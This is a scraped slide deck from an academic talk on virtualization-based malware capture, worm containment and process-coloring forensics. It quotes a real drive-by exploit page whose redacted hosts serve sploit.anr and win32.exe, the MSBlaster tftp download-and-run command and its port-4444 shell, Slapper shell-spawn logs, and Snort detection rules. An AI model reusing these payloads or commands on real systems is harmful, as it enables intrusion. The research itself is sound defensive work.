View
222
Download
0
Tags:
Embed Size (px)
Citation preview
Enabling Internet Malware Investigation and Defense Using Virtualization
Dongyan Xu
Department of Computer Science andCenter for Education and Research in
Information Assurance and Security (CERIAS)Purdue University
Collaborators
Florian Buchholz (James Madison U.) Xuxian Jiang (George Mason U.) Junghwan Rhee (Purdue U.) Ryan Riley (Purdue U.) Eugene H. Spafford (Purdue U.) AAron Walters (Fortify Research) Helen Wang (Microsoft Research) Yi-Min Wang (Microsoft Research)
Motivation: Rampant Malware Outbreaks
Blaster
Nimda
CodeRed
Source: Symantec Internet Security Threat Report
Internet malware remains a top threat Malware: Virus, Worm, Spyware, Keylogger, Bot…
Motivation: Stealthy Malware
Recruiting Vulnerable Nodes (e.g. to create Botnet) Zero-day exploits w/o software patches Low-and-slow propagation New attack strategies
Exploiting vulnerable client-side software, such as IE Propagating malware with RFID tags
Providing “Value-Added” Service (or rather, harm) DDoS, spamming, identity theft, … Sell/rent botnets for profit
Reality & Challenges Lack of investigation platform that enables
Early detection and capture of malware incidents Replay and observation of malware behavior
At Internet scale this is hard to build Increased spreading speed, sophistication, and malice
Slammer Worms infect 75,000 hosts in 10 minutes (Moore et al, 2003)
Stealthy Malware, Zero-day Exploits, Mutations, …
Our Integrated Malware Research Framework
Malware Trap
Behavioral Footprinting
Contamination Tracking
Malware Playground
Back-End: vGround
Playground
External
Infection
Internal
Contamination
System Randomization
Front-End: Collapsar Honeyfar
mCollapsar: Security’04, NDSS’06, JPDC’06
vGround: RAID’05
Proc. Coloring: ICDCS’06
Investigation
DefenseDetection
WORM’06
Part I: Malware Capture
Malware Trap
Behavioral Footprinting
Contamination Tracking
Front-End: Collapsar
*
Malware Playground
Back-End: vGround
System Randomization
Collapsar: Security’04, NDSS’06, JPDC’06
vGround: RAID’05
Coloring: ICDCS’06
WORM’06
Existing Approach: Honeypot
Domain B
Domain A
Domain C
Internet
Two Weaknesses Manageability vs. Detection Coverage Security Risks On-Site Attack Occurrences
Our Approach: Collapsar
Domain B
Domain A
Domain C
Front-End
VM-based Honeypots
Management Station
Collapsar Center
Correlation Engine
RedirectorRedirector
Collapsar HoneyfarmCollapsar Honeyfarm
Redirector
Benefit 1: Centralized management of
honeypots w/ distributed (virtual) presence
Benefit 1: Centralized management of
honeypots w/ distributed (virtual) presence
Benefit 2: Off-site attack occurrences
Benefit 2: Off-site attack occurrences
Benefit 3: New possibilities for real-time
attack correlation and log mining
Benefit 3: New possibilities for real-time
attack correlation and log mining
VM-based Honeypots
Domain B
Domain A
Domain C
Front-End
Collapsar Center
RedirectorRedirector
Redirector
Collapsar as a Server-side Honeyfarm
Passive Honeypots w/ Vulnerable Server-side Software Web Servers (e.g., Apache, IIS, …) Database Servers (e.g., Oracle, MySQL, …)
Blaster (2003) Sasser (2004) Zotob (2005)
Malicious Web
Server
VM-based Honeypots
Domain B
Domain A
Domain C
Front-End
Collapsar Center
RedirectorRedirector
Redirector
Collapsar as a Client-side Honeyfarm
Active Honeypots w/ Vulnerable Client-side Software Web Browsers (e.g., IE, Firefox, …) Email Clients (e.g., Outlook, …)
[ HoneyMonkey, NDSS’06]
PlanetLab (310 sites)
288 malicious sites / 2 zero-day exploits288 malicious sites / 2 zero-day exploits
Upon Clicking a malicious URL http://xxx.9x.xx8.8x/users/xxxx/xxx/laxx/
z.html Result:
22 unwanted programs are installed without user’s consent!
22 unwanted programs are installed without user’s consent!
MS04-013
MS03-011
MS05-002
<html><head><title></title></head><body>
<style>* {CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr")}</style>
<APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1><PARAM NAME='url' VALUE='http://vxxxxxxe.biz/adverts/033/win32.exe'></APPLET><script>
try{document.write('<object data=`ms-its:mhtml:file://C:\fo'+'o.mht!'+'http://vxxxx'+'xxe.biz//adv'+'erts//033//targ.ch'+'m::/targ'+'et.htm` type=`text/x-scriptlet`></ob'+'ject>');}catch(e){} </script>
</body></html>
A Real Incident: Exploitation of Client-side Vulnerability
Related Work
Honeyd [Security’04]iSink[RAID’04] IMS[NDSS’05]
honeyclient [RECON’05]
Domino[NDSS’04] NetBait[‘03]
Potemkin[SOSP’05]GQ[’06]
Collapsar [Security’04, JPDC’06]
High-Interaction w/ Real Services
Off-Site Attack Occurrences
Aggregation of Scattered Unused Address Space
Passive & Active Honeypots
Passive Passive PassiveActive Passive & Active
Part II: Malware Playground
Malware Trap
Behavioral Footprinting
Contamination Tracking
Front-End: Collapsar
Malware Playground
Back-End: vGround
*
System Randomization
Collapsar: Security’04, NDSS’06, JPDC’06
vGround: RAID’05
Coloring: ICDCS’06
Challenges
Fidelity Real worms Confinement Destructive worms Scalability Epidemic propagation
pattern Experimental Efficiency
A Virtualization-Based Worm Playground
paris.cs.purdue.edu
High Fidelity VM: Full-System Virtualization
Strict Confinement VN: Link-Layer Network Virtualization
Easy Deployment Locally deployable
Efficient Experiments Images generation time: 60 seconds Boot-strap time: 90 seconds Tear-down time: 10 seconds
A Worm Playground
VirtualizationVirtualization
In “Fighting Computer Virus Attacks”, Peter Szor, USENIX Security Symp., 2004 In “Fighting Computer Virus Attacks”, Peter Szor, USENIX Security Symp., 2004
Challenge in Achieving Scalability
Three Main Techniques: VM Footprint Minimization
Redhat 9.0: 1G 32M Delta Virtualization (a.k.a., Copy-on-Write) Worm-driven vGround Runtime Expansion
2000+ virtual nodes in 10 physical machines
Worm Expert’s Comments on vGround
vGround Impact & Applications
Evaluation Correctness of documented worm/malware
analysis Effectiveness of defense mechanisms
Education Potentials
Part III: Malware Defense
Malware Trap
Behavioral Footprinting
ContaminationTracking
Front-End: Collapsar
Malware Playground
Back-End: vGround
System Randomization
Internal
Contamination
Collapsar: Security’04, NDSS’06, JPDC’06
vGround: RAID’05
Coloring: ICDCS’06
Malware Forensics
For each malware incident, it is desirable to find out: Break-in Point:
How did the malware break into the system? Contaminations:
What did the malware do after the break-in?
Current Approach
httpd
/bin/sh
wgetRoot kitRoot kit
Local filesLocal files
AlertAlert
httpd netcat • /etc/shadow• Confidential
Info
• /etc/shadow• Confidential
Info
Question 1: How did the malware
break into the system?
Question 1: How did the malware
break into the system?
Question 2: What did the
malware do after break-in?
Question 2: What did the
malware do after break-in?
httpd
/bin/sh
wgetRoot kitRoot kit
Local filesLocal files
httpd netcat • /etc/shadow• Confidential
Info
• /etc/shadow• Confidential
Info
“httpd” READS an incoming request
“httpd” CREATES a new process “/bin/sh”
“/bin/sh” CREATES a new process “netcat”
“netcat” READS “/etc/shadow” file
“/bin/sh” MODIFIES local files
“/bin/sh” CREATES a new process “wget”
“wget” CREATES local file(s) - “Root kit”
Current Approach
Log
1: Online Log Collection
AlertAlert
1: Online Log Collection
httpd
/bin/sh
wgetRoot kitRoot kit AlertAlert
Backward Tracking
Current Approach
Log
2: Offline Backward Tracking
“wget” CREATES local file(s) - “Root kit”
“httpd” CREATES a new process “/bin/sh”
“/bin/sh” CREATES a new process “wget”Break-in Point
!
Break-in Point !
[King+, SOSP’03][King+, SOSP’03]
1: Online Log Collection
httpd
/bin/sh
wgetRoot kitRoot kit
Local filesLocal files
AlertAlert
netcat • /etc/shadow• Confidential
Info
• /etc/shadow• Confidential
Info
Current Approach
Log
2: Offline Backward Tracking3: Offline Forward Tracking
Forward Tracking
“httpd” CREATES a new process “/bin/sh”
“/bin/sh” CREATES a new process “netcat”
“netcat” READS “/etc/shadow” file
“/bin/sh” CREATES a new process “wget”
“wget” CREATES local file(s) - “Root kit”
Break-in Point !
Break-in Point !
“/bin/sh” MODIFIES local files
Weaknesses of Current Approach
Backward Tracking Break-in Point Inputs: Detection point and the entire Log
Forward Tracking Contaminations Inputs: Break-in point and the entire Log
timeIntrusion Detected
Intrusion Occurred
Long Detection Period
Analyze the entire log !Analyze the entire log !
High Volume Log Data: 1.2 gigabytes per day under server workload
Log
A suspicious log entry
Main Idea: Information Flow-Preserving Logging
ApacheApache SendmailSendmail DNSDNS MySQLMySQL
Our Approach - Process Coloring
httpd
Our Approach - Process Coloring
s80httpdrcinit
s45named
s30sendmail
s55sshd
s80httpd
s30sendmail
s45named
s55sshd
/bin/sh
wgetRoot kitRoot kit
Local filesLocal files
AlertAlert
netcat • /etc/shadow• Confidential
Info
• /etc/shadow• Confidential
Info
1: Initial Coloring
2: Coloring Diffusion
Log
Benefit 2: Color-based log
partition for contamination analysis
Benefit 2: Color-based log
partition for contamination analysis
Benefit 1: Immediate identification
of break-in point
Benefit 1: Immediate identification
of break-in point
Color Diffusion Model
Color Diffusion Model
OS-level Information Flow (Buchholz 2005)
Operation Diffusion syscalls
CREATE create <s1, o1>create <s1, s2>
color(o1) = color(s1)color(s2) = color(s1)
create, mkdir, linkfork, vfork,
clone
READ read <s1, o1>read <s1, s2>
color(s1) = color(s1)υ color(o1)
color(s1) = color(s1)υ color(s2)
read, readv, recvptrace
WRITEwrite <s1, o1>write <s1, s2>
color(o1) = color(s1)υ color(o1)
color(s2) = color(s1)υ color(s2)
write, writev, sendPtrace, wait,
signal
----DESTROY destroy <s1, o1>destroy <s1, s2>
unlink, rmdir, closeexit, kill
...BLUE: 673["sendmail"]: 5_open("/proc/loadavg", 0, 438) = 5BLUE: 673["sendmail"]: 192_mmap2(0, 4096, 3, 34, 4294967295, 0) =
1073868800BLUE: 673["sendmail"]: 3_read(5, "0.26 0.10 0.03 2...", 4096) = 25BLUE: 673["sendmail"]: 6_close(5) = 0BLUE: 673["sendmail"]: 91_munmap(1073868800, 4096) = 0...RED: 2568["httpd"]: 102_accept(16, sockaddr{2, cbbdff3a}, cbbdff38) = 5RED: 2568["httpd"]: 3_read(5, "\1281\1\0\2\0\24...", 11) = 11RED: 2568["httpd"]: 3_read(5, "\7\0À\5\0\128\3\...", 40) = 40RED: 2568["httpd"]: 4_write(5, "\132@\4\0\1\0\2\...", 1090) = 1090…RED: 2568["httpd"]: 4_write(5, "\128\19Ê\136\18\...", 21) = 21RED: 2568["httpd"]: 63_dup2(5, 2) = 2RED: 2568["httpd"]: 63_dup2(5, 1) = 1RED: 2568["httpd"]: 63_dup2(5, 0) = 0RED: 2568["httpd"]: 11_execve("/bin//sh", bffff4e8, 00000000)RED: 2568["sh"]: 5_open("/etc/ld.so.prelo...", 0, 8) = −2RED: 2568["sh"]: 5_open("/etc/ld.so.cache", 0, 0) = 6
Process Coloring Log – Slapper Worm
Evaluation
Lion Slapper SARSTime period
being analyzed
24 hours 24 hours 24 hours
# worm-related entries
66,504 195,884 19,494
Exploited Service
BIND(CVE-2001-
0010)
Apache(CAN-2002-0656)
Samba(CAN-2003-
0085)
% of Log Inspected
48.7% 65.9% 12.1%
Benefit for Backward Tracking: Immediate identification of break-in
point
Benefit for Backward Tracking: Immediate identification of break-in
point
Benefit for Forward Tracking: Reduced log volume for contamination
analysis
Benefit for Forward Tracking: Reduced log volume for contamination
analysis
Question : Can we trust a compromised
system to collect log information?
Question : Can we trust a compromised
system to collect log information?
Challenge in Log Collection
OS Kernel
User Process 1
User Process 2
Logging
System Call Interception
OS Kernel
User Process 1
Host OS Kernel + VMM
ptrace
User Process 2
LoggingLogging
Logging
Virtual M
achine Guest OS Kernel/UML
Interception on system virtualization path
Virtual Machine Introspection [Garfinkel+, NDSS’03]
More tamper-resistant
On-going Work
Multi-Dimensional Worm Profiling & Identification Content Fingerprinting
Unique recurring content Behavioral Footprinting
Unique recurring behavior Infection Cycle Probing Exploitation Replication
Payload
MSBlaster/Windows Worm
192.168.0.1
Blaster Target/RPC192.168.10.11
1. Exploits target on port 135/TCP 2. Binds svchost.exe to port
4444/TCP via injected code
3. Connects to target on port 4444/TCP
4. Creates a shell “cmd.exe” and binds it to port 4444/TCP
5. Creates “TFTP Server” on port 69/UDP
6. Sends “TFTP” command to shell
7. Runs TFTP command; “teleports” msblast.exe file
8. Sends “START msblast.exe” command 9. Runs worm on target!
10. Closes connection
>tftp –I 192.168.0.1 GET msblast.exe
11. Shell closes
alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"| 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B |"; …)
alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"| 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B |"; …)
Worm Name Infection Vector
Behavioral Footprints
2112221111 RUUASSRASS AAMSBlaster RPC-DOM
SYN ,135/victim /infecter,* TCP, : S1
ACK SYN, /infecter,* ,135/victim TCP, :SA1
/victim* r,69/infecte UDP, : U1
RST ,135/victim /infecter,* TCP, : R1
ACK ,135/victim /infecter,* TCP, : A1
SYN m,4444/victi /infecter,* TCP, : S2
ACK SYN, /infecter,* m,4444/victi TCP, :SA2
ACK m,4444/victi /infecter,* TCP, : A 2
r69/infecte /victim,* UDP, : U1
RST m,4444/victi /infecter,* TCP, : R 2
alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"| 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B |"; …)
alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"| 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B |"; …)
Exploitation
Replication
Worm Name Infection Vector
Behavioral Footprints
2112221111 RUUASSRASS AAMSBlaster
Welchia
Sasser
Ramen
Lion
Slapper
SARS
RPC-DOM
LSASS
LPRng
WU-FTPD
NFS-UTILS
BIND
APACHE
SAMBA
4443222111 FFCCFFCRSS F
22211211111 RUUUUCFFCII
2334443211 RFFFFCCCRC
)(3322111 flawedRCRCRSS F
23332211111 RFFCCUUURSS F
23332111 RFFCCFFC
34443222112211 RFFCCFFCFCUUUU
2423
22
322111 CCCFCFFCi
i
Summary
Domain B
Domain A
Domain C
Front-End
Redirector
Redirector
Redirector
vGround II vGround I
CollapsarCollapsar
Design and evaluation of advanced malware defense mechanisms using our unique integrated malware research
platform
Backup Slides
Another Example Incident: Windows XP Server-side Honeypot/VMware Vulnerability
RPC DCOM vulnerability (Microsoft Security Bulletin MS03-026)
Time-line Deployed: 22:10:00pm,
11/26/03 MSBlast: 00:36:47am,
11/27/03 Enbiei: 01:48:57am, 11/27/03 Nachi: 07:03:55am, 11/27/03
http://www.cs.purdue.edu/homes/jiangx/collapsarhttp://www.cs.purdue.edu/homes/jiangx/collapsar
Host OS / VMM
vGround: Network Virtualization
Host OS / VMM
Virtual Machine 1 Virtual Machine 2
Virtual Switch 1
IP-IP
Option 1: Network-Layer Virtualization (e.g., X-Bone)
Option 1: Network-Layer Virtualization (e.g., X-Bone)
Option 2: Link-Layer Virtualization (e.g., VIOLIN)
Option 2: Link-Layer Virtualization (e.g., VIOLIN)
Guest O
S
Logging Integrity -- Existing Approach
User Space
Kernel Space fork(“/bin/sh”)
System Call Dispatcher
01
34
283
System Call Table
2 fork
restart
exit
sys_restart_syscall
sys_exit
sys_forkread
write
ni_syscall
sys_read
sys_write
sys_ni_syscall
result
result
result
log_restart_syscall
log_exit
log_fork
log_read
log_write
log_ni_syscall
System call interception
System call interception
Unreliable!
Unreliable!
Virtual Machine Introspection [Garfinkel+, NDSS’03]
Interception at System Virtualization Path
Virtual Machine Monitor (VMM)
Guest OS 1 Guest OS 2
Hardware
Type 1 VMM
Virtual Machine Monitor (VMM)
Guest OS 1 Guest OS 2
Hardware
Host OS
Type 2 VMM
Guest OS 2Guest OS 2
Logging
Logging
Tamper-Resistant
!
Tamper-Resistant
!
Process Coloring -- Slapper Worm
inet_sock(80)
2568: httpd
2568(execve): /bin//sh
2568(execve): /bin/bash -i
2586: /bin/rm –rf /tmp/.bugtraq.c2587: /bin/cat
/tmp/.uubugtraq /tmp/.bugtraq.c
fd 5
recv
execve
execve
fork, execvefork, execve
open, dup2, write unlink
accept
dup2, read
Process Coloring Log – Slapper Worm
inet_sock(80)
2568: httpd
2568(execve): /bin//sh
2568(execve): /bin/bash -i
2586: /bin/rm –rf /tmp/.bugtraq.c2587: /bin/cat
/tmp/.uubugtraq /tmp/.bugtraq.c
fd 5
recv
execve
execve
fork, execvefork, execve
open, dup2, write unlink
accept
dup2, read
Counter-attacks against Proc. Coloring
Coloring mixing attack Good news: an important anomaly itself Bad news: need for advanced filtering
policies Low-level attack
Kernel integrity (e.g. CoPilot, Livewire, Pioneer)
Shadow structure via VMM Diffusion-cutting attack
Covert channels
SYN ,135/victim ter,4581/infec TCP, : S1
ACK SYN, ter,4581/infec ,135/victim TCP, :SA1
Footprinting Representation
1st TCP handshake
135/TCP
2nd TCP handshake
4444/TCP (shell)
MSBlaster Worm
69/UDP (tftp)
RST
Sending “tftp …”
RST
2112221111 RUUASSRASS AA
m1552/victi r,69/infecte UDP, : U1
RST ,135/victim ter,4581/infec TCP, : R1
ACK ,135/victim ter,4581/infec TCP, : A1
SYN m,4444/victi ter,4599/infec TCP, : S2
ACK SYN, ter,4599/infec m,4444/victi TCP, :SA2
ACK m,4444/victi ter,4599/infec TCP, : A 2
r69/infecte m,1552/victi UDP, : U1
RST m,4444/victi ter,4599/infec TCP, : R 2
SYN ,135/victim /infecter,* TCP, : S1
ACK SYN, /infecter,* ,135/victim TCP, :SA1
/victim* r,69/infecte UDP, : U1
RST ,135/victim /infecter,* TCP, : R1
ACK ,135/victim /infecter,* TCP, : A1
SYN m,4444/victi /infecter,* TCP, : S2
ACK SYN, /infecter,* m,4444/victi TCP, :SA2
ACK m,4444/victi /infecter,* TCP, : A 2
r69/infecte /victim,* UDP, : U1
RST m,4444/victi /infecter,* TCP, : R 2
alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"| 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B |"; …)
alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"| 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B |"; …)